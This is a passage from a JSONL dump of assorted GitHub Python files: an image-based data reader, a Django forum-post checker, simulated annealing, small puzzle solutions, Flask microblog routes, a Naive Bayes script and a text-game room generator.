'w') as file:\n file.write(entry[\"data\"])\n file.close()\n elif entry[\"entry_type\"] == \"binary\":\n with open(path, 'wb') as file:\n file.write(entry[\"data\"])\n file.close()\n elif entry[\"entry_type\"] == \"dir\" and not os.path.exists(path):\n os.makedirs(path)\n elif os.path.exists(path):\n os.remove(path)\n return None\n return full_data\n\n def compileEntries(self) -> list[DataEntry]:\n \"\"\"Compile all entries from the classes and return them.\"\"\"\n entries = []\n\n data_strip: DataStrip\n for data_strip in self.data_strips:\n for data_entry in data_strip.Data.entries:\n entries.append(data_entry)\n\n return entries\n\n def getChanges(self, path: str) -> list[str]:\n \"\"\"Find changes made to a file in the Glass Working Directory, compared to the Glass.\"\"\"\n file = \"\"\n\n dataStrip: DataStrip\n for dataStrip in self.data_strips:\n for entry in dataStrip.Data.entries:\n if entry.path != path:\n continue\n\n if entry.action in (\"dir\", \"binary\"):\n file = entry.data\n continue\n\n diff = entry.data\n file = diffpatch.apply_patch(file, diff)\n\n return file.splitlines(keepends=True)\n\n\nclass DataStrip:\n \"\"\"The DataStrip is a class that stores a piece of the Glass Code.\"\"\"\n\n def __init__(self, reader: Reader, position: list, index: int):\n \"\"\"Create a DataStrip that stores a piece of the Glass Code.\"\"\"\n self.position = position\n self.index = index\n self.Header = Header(reader.image.crop((1, self.position[0], 3, self.position[1])))\n self.Data = Data(reader.image.crop((4, self.position[0], 334, self.position[1])))\n\n self.loadHeader()\n self.loadData()\n\n def loadHeader(self):\n \"\"\"Load and store the header of the DataStrip.\"\"\"\n self.Header.setPixels(self.Header.image.load())\n raw_data = []\n\n for column in range(self.Header.image.size[0]):\n if column == 0:\n continue\n\n for row in range(self.Header.image.size[1]):\n pixel = self.Header.pixels[column, row]\n raw_data.append(1 if pixel == 255 else 0)\n\n self.Header.setEmptryDataLength(ba2int(bitarray.bitarray(raw_data)))\n self.Header.image.close()\n\n def loadData(self):\n \"\"\"Load and store the data of the DataStrip.\"\"\"\n self.Data.setPixels(self.Data.image.load())\n raw_data = []\n\n for column in range(self.Data.image.size[0]):\n for row in range(self.Data.image.size[1]):\n pixel = self.Data.pixels[column, row]\n raw_data.append(1 if pixel == 255 else 0)\n\n raw_data = raw_data[:len(raw_data) - self.Header.empty_data_length]\n for entry in zlib.decompress(bitarray.bitarray(raw_data).tobytes(), 15 + 32).decode(\"utf-8\").splitlines():\n self.Data.addEntry(entry)\n\n self.Data.image.close()\n\n\nclass Header:\n \"\"\"The Header class stores the header of a DataStrip.\"\"\"\n\n image: Image.Image\n pixels: PyAccess.PyAccess\n empty_data_length: int\n\n def __init__(self, image: Image.Image) -> None:\n \"\"\"Create the header of a DataStrip.\"\"\"\n self.image = image\n\n def setPixels(self, pixels: PyAccess.PyAccess):\n \"\"\"Set the `self.pixels` variable the a header.\"\"\"\n self.pixels = pixels\n\n def setEmptryDataLength(self, empty_data_length: int):\n \"\"\"Set the `self.empty_data_length` variable the a header.\"\"\"\n self.empty_data_length = empty_data_length\n\n\nclass Data:\n \"\"\"The Data class stores the data of a DataStrip.\"\"\"\n\n image: Image.Image\n pixels: PyAccess.PyAccess\n entries: list[DataEntry]\n\n def __init__(self, image: Image.Image) -> None:\n \"\"\"Create the data of a DataStrip\"\"\"\n self.image = image\n self.entries = []\n\n def setPixels(self, 
pixels: PyAccess.PyAccess):\n \"\"\"Set the `self.pixels` variable the a data.\"\"\"\n self.pixels = pixels\n\n def addEntry(self, entry: str):\n \"\"\"Add an entry to the data.\"\"\"\n self.entries.append(DataEntry(entry))\n","repo_name":"TMShader/GlassProject","sub_path":"glass/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":8497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1535117679","text":"# -*- coding: utf-8 -*-\n\nimport urlparse\n\nfrom django.db import connections\nfrom django.contrib import messages\nfrom django.shortcuts import redirect, get_object_or_404\n\nfrom adb.frontend.auth.decorators import permission_required, checks_permissions, require_permissions\nfrom adb.frontend.shortcuts import render_to_response\n\nfrom adb.frontend.checker import forms\n\n#@permission_required('checker.i')\ndef index(request):\n \n if request.method == 'POST':\n form = forms.CheckForm(request.POST)\n \n if form.is_valid():\n return redirect('checker:check', release=form.cleaned_data['id'])\n else:\n form = forms.CheckForm()\n \n return render_to_response('checker/index.html', {\n 'form': form,\n }, request)\n\ndef check(request, release):\n \n DATABASE = 'forum'\n FORUM = 18\n \n cursor = connections[DATABASE].cursor()\n \n query = \"\"\"SELECT p.pagetext, u.username, u.userid, t.title\n FROM thread t\n INNER JOIN post p ON t.firstpostid = p.postid\n INNER JOIN user u ON t.postuserid = u.userid\n WHERE t.threadid=%s AND t.forumid=%s\"\"\"\n \n cursor.execute(query, [int(release), FORUM])\n \n try:\n content, poster, posterid, title = cursor.fetchone()\n except TypeError:\n # No results returned, invalid ID or topic not in the allowed forum\n messages.error(request, 'Topic non trovato, assicurati che il topic esista e si trovi nel forum “Streaming › Film.”')\n return redirect('checker:index')\n \n from parser import PostParser\n from jinja2.utils import escape\n \n parser = PostParser()\n result, normalized, uppers = parser.parse(content)\n \n users = [[posterid, poster, 'Autore', [(posterid, poster)], 0]]\n \n offset = 0\n \n def mark(text, count, open, close, offset=0):\n start = '$$%d$$' % count\n end = '$$/%d$$' % count \n \n text = text[:open + offset] + start + text[open + offset:]\n offset += len(start)\n text = text[:close + offset] + end + text[close + offset:]\n offset += len(end)\n \n return text, offset\n \n for i, upper in enumerate(uppers):\n content, offset = mark(content, i, upper[1], upper[2], offset)\n db_users = None\n query = \"\"\"SELECT userid, username\n FROM user\n WHERE username=%s\"\"\"\n \n cursor.execute(query, [upper[0]])\n try:\n db_users = cursor.fetchall()\n \n if not db_users:\n raise TypeError\n except TypeError:\n try:\n query = \"\"\"SELECT userid, username\n FROM user\n WHERE username LIKE %s\"\"\"\n \n cursor.execute(query, ['%' + upper[0] + '%'])\n db_users = cursor.fetchall()\n \n if not db_users:\n raise TypeError\n except TypeError:\n # No results returned, invalid username\n users.append((None, upper[0], 'Testo', [(None, u'—')], i))\n \n if db_users:\n if len(db_users) is 1:\n userid = db_users[0][0]\n else:\n userid = None\n username = db_users\n \n if users[0][0] == userid:\n if not users[0][2].endswith('e testo'):\n users[0][2] += ' e testo'\n else:\n users.append((userid, upper[0], 'Testo', username, i))\n \n content = unicode(escape(content))\n \n for i, upper in enumerate(uppers):\n content = content.replace('$$%d$$' % i, ' ' % i)\n content = 
content.replace('$$/%d$$' % i, '')\n \n return render_to_response('checker/results.html', {\n 'release': release,\n 'content': content,\n 'uppers': users,\n 'urls': normalized,\n 'images': result['Immagine'],\n 'title': title,\n }, request)\n\n","repo_name":"AnimeDB/adb-browser-frontend","sub_path":"adb/frontend/checker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4050,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"88317243","text":"import math\nimport random\nimport utils\n\n\nclass SimulatedAnnealingConfig:\n def __init__(self, temp: int, stoppingTemp: float, alpha: float, stoppingIter: float) -> None:\n self.temp = temp\n self.stoppingTemp = stoppingTemp\n self.alpha = alpha\n self.stoppingIter = stoppingIter\n\n\nclass SimulatedAnnealing:\n def __init__(self, coords, config: SimulatedAnnealingConfig):\n self.coords = coords\n self.sample_size = len(coords)\n self.temp = config.temp\n self.alpha = config.alpha\n self.stopping_temp = config.stoppingTemp\n self.stopping_iter = config.stoppingIter\n self.iteration = 1\n\n self.dist_matrix = utils.vectorToDistMatrix(coords)\n self.curr_solution = utils.nearestNeighbourSolution(self.dist_matrix)\n self.best_solution = self.curr_solution\n\n self.solutionHistory = [self.curr_solution]\n\n self.curr_weight = self.weight(self.curr_solution)\n self.initial_weight = self.curr_weight\n self.min_weight = self.curr_weight\n\n self.weight_list = [self.curr_weight]\n\n print('Intial weight: ', self.curr_weight)\n\n def weight(self, sol):\n return sum([self.dist_matrix[i, j] for i, j in zip(sol, sol[1:] + [sol[0]])])\n\n def acceptance_probability(self, candidate_weight):\n '''\n Acceptance probability as described in:\n https://stackoverflow.com/questions/19757551/basics-of-simulated-annealing-in-python\n '''\n return math.exp(-abs(candidate_weight - self.curr_weight) / self.temp)\n\n def accept(self, candidate):\n '''\n Accept with probability 1 if candidate solution is better than\n current solution, else accept with probability equal to the\n acceptance_probability()\n '''\n candidate_weight = self.weight(candidate)\n if candidate_weight < self.curr_weight:\n self.curr_weight = candidate_weight\n self.curr_solution = candidate\n if candidate_weight < self.min_weight:\n self.min_weight = candidate_weight\n self.best_solution = candidate\n\n else:\n if random.random() < self.acceptance_probability(candidate_weight):\n self.curr_weight = candidate_weight\n self.curr_solution = candidate\n\n def anneal(self):\n '''\n Annealing process with 2-opt\n described here: https://en.wikipedia.org/wiki/2-opt\n '''\n while self.temp >= self.stopping_temp and self.iteration < self.stopping_iter:\n candidate = list(self.curr_solution)\n l = random.randint(2, self.sample_size - 1)\n i = random.randint(0, self.sample_size - l)\n\n candidate[i: (i + l)] = reversed(candidate[i: (i + l)])\n\n self.accept(candidate)\n self.temp *= self.alpha\n self.iteration += 1\n self.weight_list.append(self.curr_weight)\n self.solutionHistory.append(self.curr_solution)\n\n print('Minimum weight: ', self.min_weight)\n print('Improvement: ',\n round((self.initial_weight - self.min_weight) / (self.initial_weight), 4) * 100, '%')\n\n return [self.coords, 
self.solutionHistory]\n","repo_name":"shashik5/cnc-code-generator","sub_path":"src/algorithms/simulated_annealing.py","file_name":"simulated_annealing.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73766186476","text":"#label: math difficulty: easy\n\nclass Solution:\n def convertToBase7(self, num: int) -> str:\n base7 = []\n if num < 0:\n flag = 1\n num = -num\n else:\n flag = 0\n while num >= 7:\n fig = str(num % 7)\n base7.append(fig)\n num = num // 7\n base7.append(str(num))\n if flag:\n base7.append('-')\n base7.reverse()\n return ''.join(base7)\n","repo_name":"Aurora-yuan/Leetcode_Python3","sub_path":"0504 七进制数/0504 七进制数.py","file_name":"0504 七进制数.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"35697407516","text":"#Authors: Brad Stephens, John Murray \n#Project: CSC 407 - Program 3 \n#Due: July 19th, 2010\n#File: Room.py\n\nimport random\nfrom Static import *\nfrom Player import *\nfrom Creature_Factory import *\nfrom Weapon_Factory import *\nfrom Armor_Factory import *\nfrom Item_Factory import *\n\nclass Room:\n\n def __init__(self, description, creature=None, item=list(), gold=0):\n #code here\n self.description = description\n self.creature = creature\n self.item = item\n self.gold = gold\n\nclass Room_Factory:\n\n def __init__(self):\n self\n\n #static definition to generate random descriptions\n def get_room_description(self):\n descrip = [\n 'room 1',\n 'room 2',\n 'room 3',\n 'room 4',\n 'room 5',\n 'room 6',\n 'room 7',\n 'room 8',\n 'room 9',\n 'room 10',\n 'room 11',\n 'room 12',\n ]\n \n return descrip[random.randrange(0, len(descrip))]\n\n def generate(self):\n #description item and gold\n description = self.get_room_description()\n gold = random.randrange(101)\n #generate creature\n chance = random.randrange(1000)\n if( chance > 300 ):\n cf = Creature_Factory()\n creature = cf.generate()\n else:\n creature = None\n #generate items\n items = list()\n itf = Item_Factory()\n items.append( itf.generate() )\n wf = Weapon_Factory()\n items.append( wf.generate() )\n af = Armor_Factory()\n items.append( af.generate() )\n return Room( description, creature, items, gold )\n \n \n","repo_name":"JohnMurray/Labyrinth","sub_path":"Room_Module.py","file_name":"Room_Module.py","file_ext":"py","file_size_in_byte":1705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"21807969118","text":"import sys\nimport collections as cl\n\n\ndef main():\n f = open(sys.argv[1] if len(sys.argv) > 1 else 'in')\n lines = [l.rstrip('\\n') for l in f]\n g = get_rating(lines, True)\n e = get_rating(lines, False)\n print(g * e)\n\ndef get_rating(lines, is_most):\n for c in rangelen(lines[0]):\n umpth = get_umpth_common(lines, c, is_most)\n lines = [L for L in lines if L[c] == umpth]\n if len(lines) == 1:\n return int(lines[0], 2)\n\ndef get_umpth_common(lines, column, is_most):\n values = [line[column] for line in lines]\n most_common, count = cl.Counter(values).most_common(1)[0]\n if count * 2 == len(values):\n return str(int(is_most))\n elif is_most:\n return most_common\n else:\n return other(most_common)\n\ndef rangelen(lst):\n return range(len(lst))\n\ndef other(s):\n return '0' if s == '1' else '1'\n\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"prendradjaja/advent-of-code-2021","sub_path":"03--binary-diagnostic/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"29349610076","text":"import datasets\nfrom pathlib import Path\nimport argparse\n\ndef load(args):\n return datasets.load_dataset(\"cc100\", lang=args.languages, split=\"train\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n \n parser.add_argument('--languages', default='gn', type=str,\n help='Language to finetune on.')\n parser.add_argument('--target_dir', default='./results_nl/', type=Path)\n \n args = parser.parse_args()\n datasets.config.DOWNLOADED_DATASETS_PATH = args.target_dir\n\n load(args)\n","repo_name":"tijmenvanetten/Cross-Lingual-Subnetwork-Analysis","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"17138659128","text":"from datetime import datetime\n\nfrom flask import render_template, flash, url_for, request, current_app\nfrom flask_login import current_user, login_required\nfrom werkzeug.utils import redirect\n\nfrom application import db\nfrom application.auth.forms import EditProfileForm, EmptyForm, PostForm\nfrom application.main import main\nfrom application.models import Users, Posts\n\n\n@main.before_request\ndef before_request():\n if current_user.is_authenticated:\n current_user.last_seen = datetime.utcnow()\n db.session.commit()\n\n\n@main.route('/', methods=['GET', 'POST'])\n@main.route('/index', methods=['GET', 'POST'])\n@login_required\ndef index():\n form = PostForm()\n if form.validate_on_submit():\n post = Posts(body=form.post.data, author=current_user)\n db.session.add(post)\n db.session.commit()\n flash('Your post is now live!')\n return redirect(url_for('index'))\n page = request.args.get('page', 1, type=int)\n posts = current_user.followed_posts().paginate(page, current_app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('.index', page=posts.next_num) if posts.has_next else None\n prev_url = url_for('.index', page=posts.prev_num) if posts.has_prev else None\n return render_template(\"index.html\", title=\"Home page\", form=form, posts=posts.items, next_url=next_url,\n prev_url=prev_url)\n\n\n@main.route('/news', methods=['GET', 'POST'])\n@login_required\ndef news():\n page = request.args.get('page', 1, type=int)\n posts = Posts.query.order_by(Posts.timestamp.desc()).paginate(page, current_app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('.news', page=posts.next_num) if posts.has_next else None\n prev_url = url_for('.news', page=posts.prev_num) if posts.has_prev else None\n return render_template(\"index.html\", title=\"Home page\", posts=posts.items, next_url=next_url,\n prev_url=prev_url)\n\n\n@main.route('/user/')\n@login_required\ndef profile(username):\n user = Users.query.filter_by(username=username).first_or_404()\n page = request.args.get('page', 1, type=int)\n posts = user.posts.order_by(Posts.timestamp.desc()).paginate(page, current_app.config['POSTS_PER_PAGE'], False)\n next_url = url_for('.profile', username=user.username, page=posts.next_num) if posts.has_next else None\n prev_url = url_for('.profile', username=user.username, page=posts.prev_num) if posts.has_prev else None\n form = EmptyForm()\n return render_template('profile.html', user=user, posts=posts.items, form=form, 
next_url=next_url,\n prev_url=prev_url)\n\n\n@main.route('/edit', methods=['GET', 'POST'])\n@login_required\ndef edit_profile():\n form = EditProfileForm(current_user.username)\n if form.validate_on_submit():\n current_user.username = form.username.data\n current_user.about = form.about.data\n db.session.commit()\n flash(\"Your changes have been saved!\")\n return redirect(url_for('.profile', username=current_user.username))\n elif request.method == 'GET':\n form.username.data = current_user.username\n form.about.data = current_user.about\n return render_template('edit_profile.html', title='Edit Profile',\n form=form)\n\n\n@main.route('/follow/', methods=['POST'])\n@login_required\ndef follow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(username=username).first()\n if user is None:\n flash(\"User {} not found\".format(username))\n return redirect(url_for('.index'))\n if user == current_user:\n flash(\"You can not follow yourself!\")\n return redirect(url_for('.index', username=username))\n current_user.follow(user)\n db.session.commit()\n flash('You are following {}!'.format(username))\n return redirect(url_for('.profile', username=username))\n else:\n return redirect(url_for('.index'))\n\n\n@main.route('/unfollow/', methods=['POST'])\n@login_required\ndef unfollow(username):\n form = EmptyForm()\n if form.validate_on_submit():\n user = Users.query.filter_by(username=username).first()\n if user is None:\n flash(\"User {} not found\".format(username))\n return redirect(url_for('.index'))\n if user == current_user:\n flash(\"You can not follow yourself!\")\n return redirect(url_for('.index', username=username))\n current_user.unfollow(user)\n db.session.commit()\n flash('You are not following {} anymore!'.format(username))\n return redirect(url_for('.profile', username=username))\n else:\n return redirect(url_for('.index'))\n","repo_name":"rkhimka/microblog","sub_path":"application/main/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1675350146","text":"class Solution:\n def merge(self, intervals):\n sz = len(intervals)\n result = []\n if (sz == 0):\n return result\n\n # sort the intervals in ascending order of first element\n sorted(intervals, key=lambda x: x[0])\n\n # store the first interval into result\n result.append(intervals[0])\n\n currentInterval = intervals[0]\n\n # use an idx to iterate over intervals\n idx = 0\n\n for interval in intervals:\n # get current intervals end to compare it to interval\n currEnd = currentInterval[1]\n nextBegin = interval[0]\n nextEnd = interval[1]\n # if the next interval start is less than current intervals end, there is overlap\n if currEnd >= nextBegin:\n currentInterval[1] = max(currEnd, nextEnd)\n result[idx][1] = currentInterval[1]\n else:\n # set the current interval to interval since there is no overlap\n currentInterval = interval\n result.append(currentInterval)\n idx += 1\n result\n\n\ndef main():\n mySol = Solution()\n nums = [[1, 3], [2, 6], [8, 10], [15, 18], [16, 21]]\n result = mySol.merge(nums)\n print(\"Merged intervals for the given intervals \" +\n str(nums) + \" are \" + str(result))\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"karan2808/Python-Data-Structures-and-Algorithms","sub_path":"Arrays/MergeIntervals.py","file_name":"MergeIntervals.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"28248057693","text":"n=int(input())\r\nl=list(map(int,input().split()))\r\nl+=list(map(int,input().split()))\r\nl=list(set(l))\r\nl.sort()\r\nif(l[0]==0):\r\n l=l[1:]\r\n\r\n#print(l,list(range(1,n+1)))\r\nif(l==list(range(1,n+1))):\r\n print(\"I become the guy.\")\r\nelse:\r\n print(\"Oh, my keyboard!\")\r\n","repo_name":"venkat-12345/CodeForces","sub_path":"Code force/I wanna be the guy.py","file_name":"I wanna be the guy.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16758276906","text":"import math\nimport numpy as np\nfrom binarytree import tree, Node\n\n# pandas version: https://www.youtube.com/watch?v=HWzyEslmSOg&t=113s\n\nclass generalNode:\n def __init__(self, val, left, right) -> None:\n self.val = val\n self.left = left\n self.right = right\n\nclass KDNode(Node):\n def __init__(self, _id, data, idx=0, left = None, right = None) -> None:\n super().__init__(_id)\n #self.value = _id\n self.data = data # value is a tuple or list\n self.idx = idx\n self.left = left\n self.right = right\n\nclass KDTree:\n\n def __init__(self, data) -> None:\n self.data = data\n self.root = None\n self.K = len(data[0]) if len(data) else 0\n\n def chooseBest(self, target, node1, node2):\n dist1 = self.dist(target, node1)\n dist2 = self.dist(target, node2)\n \n if dist1 <= dist2:\n return node1, dist1\n else:\n return node2, dist2\n\n def dist(self, target, node):\n if not node:\n return float(\"inf\")\n\n return sum((i-j)**2 for i, j in zip(target, node.data))\n\n def find_NN(self, node, target, depth=0):\n \n if node is None:\n return None, float(\"inf\")\n\n K = self.K\n idx = depth % K\n if target[idx] > node.data[idx]:\n next = node.right\n drop = node.left\n else:\n next = node.left\n drop = node.right\n\n sub, sub_dist = self.find_NN(next, target, depth + 1)\n best, best_dist = self.chooseBest(target, sub, node)\n\n if target[idx] - node.data[idx] < best_dist:\n sub2, sub_dist = self.find_NN(drop, target, depth + 1)\n best, best_dist = self.chooseBest(target, best, sub2)\n\n return best, best_dist\n\n def _build(self, data, depth, K):\n\n L = len(data)\n if L == 0:\n return None\n mid = L // 2\n data.sort(axis = depth%K) #data.sort(key = lambda x:x[depth%K])\n ind = np.lexsort(data[:, depth%K],)\n # ind = np.argsort(data[:, depth%K])\n data = data[ind]\n\n \"\"\"\n _col = data.columns[depth%k]\n obj_lst = data.sort_values(by = [_col], ascending=True)\n node = KDNode(obj_lst.iloc[mid], idx = mid)\n node.left = self._build(obj_lst.iloc[:mid], depth=depth+1)\n node.right = self._build(obj_lst.iloc[mid+1:], depth=depth+1)\n \"\"\"\n\n node = KDNode(int(data[mid][depth%K]), data[mid], depth%K)\n node.left = self._build(data[:mid], depth+1, K)\n node.right = self._build(data[mid+1:], depth+1, K)\n\n return node\n\n def build(self):\n self.root = self._build(self.data, depth=0, K=len(self.data[0]))\n\n\ndef check(target, data):\n \"\"\"\n Compute dists betwwen target and all the data points\n Parameters:\n -----------\n target: (M,)\n data: (N, M)\n Returns:\n --------\n lst_dists: (N, )\n List of distance between target and all the data points.\n \"\"\"\n\n if isinstance(target, list):\n target = 
np.array(target, dtype = np.float16)\n\n return np.linalg.norm(target - data, axis = 1)\n\n\ntarget = [6,7,3,9,2]\ndata = np.random.randint(0,20,[10,5])\n# data = [[2,3, 5],[5,4,2],[4,7,0],[8,1,9],[9,6,7],[7,2,4]]\nkd_tree = KDTree(data)\nkd_tree.build()\nprint(kd_tree.root)\n\nbest, best_dist = kd_tree.find_NN(kd_tree.root, target)\nres = check(target, data)\ncheck_res = data[np.argmin(res, axis = 0)]\n\nprint(\"knn result matches checked result\") if np.equal(check_res, best.data).all() else print(\"knn doesn't get the optimal result.\")\n\n","repo_name":"jiayi-xian/coding","sub_path":"leetcode_codes/KD_tree.py","file_name":"KD_tree.py","file_ext":"py","file_size_in_byte":3597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"29477274785","text":"# coding=utf-8\n# Author: Rion B Correia\n# Date: July 08, 2019\n#\n# Description: Reads GOAE results for each module and plots results\n#\n#\nimport math\nimport numpy as np\nimport pandas as pd\npd.set_option('display.max_rows', 100)\npd.set_option('display.max_columns', 500)\npd.set_option('display.width', 1000)\nfrom utils import ensurePathExists\nimport matplotlib as mpl\nmpl.rcParams['font.family'] = 'Helvetica'\nmpl.rcParams['mathtext.fontset'] = 'cm'\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n#\nfrom wordcloud import WordCloud\nfrom nltk.corpus import stopwords\n\n\ndef plot_goea(celltype='spermatocyte', layer='DM'):\n\n rCSVFile = 'results/goea-{network:s}-{layer:s}.csv'.format(network=network, layer=layer)\n df = pd.read_csv(rCSVFile)\n\n # Trim\n df = df.loc[(df['depth'] >= 5), :]\n\n # All zeros are set to the smallest computable float\n df.loc[df['p_fdr_bh'] == 0.0, 'p_fdr_bh'] = np.nextafter(0, 1)\n #\n df['1-log(p)'] = 1 - (np.log(df['p_fdr_bh']))\n dft10 = df.iloc[:10, :].sort_values('1-log(p)', ascending=True)\n sl = 75 # string slice\n dft10['name'] = dft10['name'].apply(lambda x: x[0:sl] + '..' 
if len(x) > sl else x)\n\n # Plot\n fig, ax = plt.subplots(figsize=(4.7, 3.0))\n\n # P-values\n title = 'GOEA-{network:s}'.format(network=network)\n\n ind = np.arange(0, len(dft10), 1)\n bp = ax.barh(ind, 1 - np.log(dft10['p_fdr_bh']), height=0.8, facecolor=facecolor, zorder=4)\n ax.set_title(title, fontsize='large')\n\n minx, maxx = ax.get_xlim()\n for bar, name in zip(bp.patches, dft10['name'].tolist()):\n bx = bar.get_x()\n by = bar.get_y()\n bh = bar.get_height()\n # bw = bar.get_width()\n tx = bx + (0.01 * maxx)\n ty = (by + (bh / 2))\n ax.text(x=tx, y=ty, s=name, ha='left', va='center', fontsize='x-small', zorder=5)\n #\n #ax.axvline(x=(1 - math.log(0.01)), color='#666666', ls='dotted')\n ax.axvline(x=(1 - math.log(0.05)), color='#c7c7c7', ls='dashed')\n ax.set_yticks(ind)\n ax.set_yticklabels(dft10['GO'])\n ax.set_xlabel(r'$1 - $log($p$-value)')\n ax.set_ylim(-0.7, (10 - 0.3))\n ax.grid(axis='x', zorder=1)\n\n plt.subplots_adjust(left=0.21, right=0.97, bottom=0.17, top=0.89)\n #plt.tight_layout()\n #\n wIMGFile = 'images/img-goea-bars-{network:s}-{layer:s}.pdf'.format(network=network, layer=layer)\n ensurePathExists(wIMGFile)\n plt.savefig(wIMGFile, dpi=300, bbox_inches=None, pad_inches=0.0)\n plt.close()\n\n\nif __name__ == '__main__':\n\n network = 'rnf113' # 'thr'\n layer = 'HS'\n\n dict_specie = {'HS': 'Human', 'MM': 'Mouse', 'DM': 'Insect'}\n facecolor = '#ffbb78'\n\n data_text_color = {\n 1: ['ubiquitination', 'ubiquitin'],\n 2: ['splicing'],\n 3: ['translation', 'translational', 'cotranslational'],\n 4: ['rRNA'],\n 5: ['vesicle', 'transport'],\n 6: ['respiration', 'respiratory', 'electron'],\n 7: ['cell', 'cycle'],\n 8: ['DNA', 'repair'],\n 9: ['mitochondrial', 'translation', 'translational'],\n 10: ['cell', 'cycle'],\n 11: ['metabolic'],\n 12: ['histidine', 'peptidyl', 'dephosphorylation'],\n }\n\n plot_goea(network, layer)\n","repo_name":"rionbr/meionav","sub_path":"05-data-analysis/gene-prp13-exploration/05-plot-goea.py","file_name":"05-plot-goea.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"5324345910","text":"from profiler import profile\n\n\ndef list_in(a, b):\n return [x in b for x in a]\n\n\ndef set_in(a, b):\n s = set(b)\n return [x in s for x in a]\n\n\nmethods = [list_in, set_in]\nfig = profile(methods)\nfig.tight_layout();\nfig.savefig('first_figure.png')","repo_name":"amanlai/stack-overflow-answers","sub_path":"pure-python/check-values-exist-in-list/first_figure.py","file_name":"first_figure.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"15930690259","text":"from tkinter import *\n\nfrom langcodes import *\n\nfrom langdetect import detect\n\nroot = Tk()\n\nroot.title(\"Language Detector using module \\\"langdetect\\\" By @SmashdFrenzy16\")\n\ndetector = Entry(root, width=100, borderwidth=5)\ndetector.pack()\ndetector.insert(0, \"Enter Unknown Language\")\n\ndef execute():\n\n\n detecting = detect(detector.get())\n \n final = Language.make(language = detecting).display_name()\n\n answerlabel = Label(root, text=final)\n answerlabel.pack()\n\nenter = Button(root, text=\"Enter\", 
command=execute)\nenter.pack()\n\nroot.mainloop()\n","repo_name":"SmashedFrenzy16/Unknown-Language-Detector","sub_path":"Detectors/langdetect_detector.py","file_name":"langdetect_detector.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"28582879457","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.naive_bayes import MultinomialNB\nimport sys\n\nMIN = '1'\n\nclf = MultinomialNB(alpha=1.0, class_prior=None, fit_prior=True)\ndef NaiveBayes(TRAIN, TEST):\n X = TRAIN.iloc[:,:TRAIN.shape[1]-1].values # 配列に変換 ('label'を除く)\n y = TRAIN['label'].values # ラベル抽出\n X_t = TEST.iloc[:,:TEST.shape[1]-1].values\n y_t = TEST['label'].values\n clf.fit(X, y) # 学習する\n result = clf.predict(X_t) # 予測する\n df_result = pd.DataFrame(result)\n df_result.to_csv('./Plot/result_' + MIN + 'min.csv', index=False)\n # print(\"精度 -> %f\" % (np.sum(result==y_t)/TEST.shape[0]))\n\n# データを読み込んで,シャッフルする\ndf_train = pd.read_csv('./TrainingData/' + MIN + 'min_train.csv', dtype='int16')\ndf_test = pd.read_csv('./TrainingData/' + MIN + 'min_test.csv', dtype='int16')\nNaiveBayes(df_train, df_test)\n","repo_name":"Takuya-FUJITA/cuda_backup","sub_path":"NB/Connect_Time/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5781998141","text":"import os\nimport sys\n\nfile_dir = os.path.dirname(__file__)\nsys.path.append(file_dir)\n\nimport json\nimport uuid\nimport collections\nfrom flask import jsonify\nfrom Quiz import Quiz\n\nclass Question:\n\n\tdef path_to_file_question(self):\n\t\twith open('config.json', 'r') as file:\n\t\t\tfile = json.load(file)\n\t\treturn file[\"questions_path\"]\n\t\n\tdef read_question_file(self):\n\t\tpath_to_file = self.path_to_file_question()\n\t\twith open(path_to_file, 'r') as json_file:\n\t\t\tquestions_json_file = json.load(json_file)\n\t\treturn questions_json_file\n\n\tdef write_questions_json_file(self, questions_json_file):\n\t\tpath_to_file = self.path_to_file_question()\n\t\twith open(path_to_file, 'w') as file_question:\n\t\t\tjson.dump(questions_json_file, file_question)\n\n\tdef show_question(self, question_id):\n\t\ttry:\n\t\t\tquestion_file = self.read_question_file()\n\t\t\tfor dic_quest in question_file:\n\t\t\t\tif dic_quest['id'] == question_id:\n\t\t\t\t\treturn 